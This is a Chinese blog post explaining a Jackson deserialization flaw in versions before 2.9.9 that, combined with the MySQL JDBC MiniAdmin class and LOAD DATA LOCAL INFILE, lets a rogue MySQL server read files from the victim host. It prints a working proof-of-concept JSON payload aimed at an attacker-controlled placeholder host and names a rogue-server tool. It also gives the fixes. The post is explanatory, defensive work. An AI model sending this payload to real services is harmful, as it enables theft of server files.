java进阶干货Java技术升华

Jackson安全漏洞,可导致服务器文件被恶意窃取

2019-09-17  本文已影响0人  美团Java

上周升级完Fastjson之后,去了解了下Jackson是否也有相关的漏洞。

果不其然,看到了一个issue

虽然这个issue是好几个月前的了,但是可能大家对Jackson比较不在意,以为国外的开源要牛逼一点,不会像Fastjson那么多问题,这里要纠正一点,fastjson之所以问题多,那是因为你接触的多,Jackson的问题其实也不少,只是你接触的少。

就拿这种issue的问题来说,这个漏洞也很严重,攻击者可以通过构造特殊的字符串,然后在特定条件下可以悄无声息的窃取你服务器上的文件数据。

可怕不?但是恐怕知道的人不多,很多服务还是依赖着低版本的Jackson,也没升级。

解释下到底是什么漏洞,这么危险!

使用了Jackson 2.9.9之前的Java应用,如果服务依赖了mysql-connector-java,那么这个服务所在机器上的文件,就可能被任意读取走。

下面是具体原理分析。

先看下Json序列化对多态性的处理方式

public static class Person {
    public String name;
    public int age;
    public Pet pet;
}
public static abstract class Pet {
    public String name;
}
public static class Dog extends Pet {
    public int age;
}
public static class Cat extends Pet {
}

ObjectMapper om = new ObjectMapper();
Person p = new Person();
p.name = "小黑";
p.age = 28;
Dog pet = new Dog();
pet.name = "小强";
pet.age = 2;
p.pet = pet;
System.out.println(om.writeValueAsString(p));

序列化之后

{"name":"小黑","age":28,"pet":{"name":"小强","age":2}}

序列化后类型消失,反序列化时因为Pet是抽象类,不知道该创建哪一个子类的对象。

但是Jackson提供了Default Typing,在开启的时候,可以序列化出更具体的类型。

ObjectMapper om = new ObjectMapper();
om.enableDefaultTyping(); 

得到的结果:

{"name":"小黑","age":28,"pet":["***.Dog",{"name":"小强","age":2}]}

所以,Jackson在开启Default Typing特性之后,就可以初始化一个具体的实例。

这个讲完之后,我们看下漏洞的最终元凶,MySQL的一个特殊用法:支持使用LOAD DATA LOCAL INFILE这样的语法,只要客户端连上某个MySQL服务,就可以把客户端本地文件的数据插入到这个MySQL的某个表中。

大概过程是这样的:

这里有一个问题,客户端发送哪个文件的内容,取决于第3步,如果服务端是个恶意的MySQL服务,那么他可以读取客户端的任意文件,比如读取/etc/passwd:

然后密码文件的内容就这样被嫖了。

引用MySQL官方文档如下:

In theory, a patched server could be built that would tell the client program to transfer a file of the server's choosing rather than the file named by the client in the LOAD DATA statement.

理论上,可以构建一个伪装服务器,它将告诉客户端传送一个服务指定的而不是通过客户端LOAD DATA语句指定的文件,意味着,我要什么,你就得给我什么,所以所有文件都可能泄露。

具体如何让服务中的MySQL客户端可以听我指挥,连到我预谋已久的MySQL服务呢?

首先,在MySQL的JDBC驱动中有一个创建连接的配置allowLoadLocalInfile,控制是否可以从本地读取文件,默认是可以的。

另外,不知道从哪个版本开始,MySQL的JDBC驱动多了一个类com.mysql.cj.jdbc.admin.MiniAdmin,可能没什么人用过,平时也用不到,但是它的牛逼之处在于可以创建一个到执行URL的JDBC连接。

public class MiniAdmin {
        private JdbcConnection conn;
    
        public MiniAdmin(String jdbcUrl) throws SQLException {
            this(jdbcUrl, new Properties());
        }
    
        public MiniAdmin(String jdbcUrl, Properties props) throws SQLException {
            this.conn = (JdbcConnection) (new Driver().connect(jdbcUrl, props));
        }
    
        ...
    }

想想,如果这个URL是我的那个伪装的MySQL服务,是不是就可以控制这个客户端轻松练上来,然后做一些不为人知的事情了。

事实上,确实可以。通过Jackson的反序列化特殊字符串,可以触发MiniAdmin的初始化,然后就在构造方法里创建一个到指定我MySQL服务的JDBC连接。

我们动手创建一个恶意的MySQL服务,可以使用https://github.com/Gifts/Rogue-MySql-Server,这个服务会读取客户端文件,并写入到mysql.log中。

启动服务,假设服务地址为:X.X.X.X.

    ObjectMapper om = new ObjectMapper();
    om.enableDefaultTyping();

    String poc = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://X.X.X.X:3306/db\"]";
    Object obj = om.readValue(poc, Object.class);

在客户端中执行如上代码,端口号和文件号在Rogue-MySql-Server中写死了,执行完之后,机器上的c:\windows\win.ini文件内容就会出现在mysql.log中。

在实际的生产环境中,可以通过往一些接受JSON参数的接口发送恶意的JSON数据来达成攻击的目的。

MySQL方面,从8.0.15开始将allowLoadLocalInfile默认值设置为false。

Jackson方面,从2.9.9版本开始,将com.mysql.cj.jdbc.admin.MiniAdmin加入反序列化黑名单:

怎么保护自己的系统

1、反序列化的坑,很大!需要尽量避免使用Object对象作为Jackson反序列化的目标。
2、序列化工具,该升级的要升级,不能拖!

上一篇下一篇

猜你喜欢

热点阅读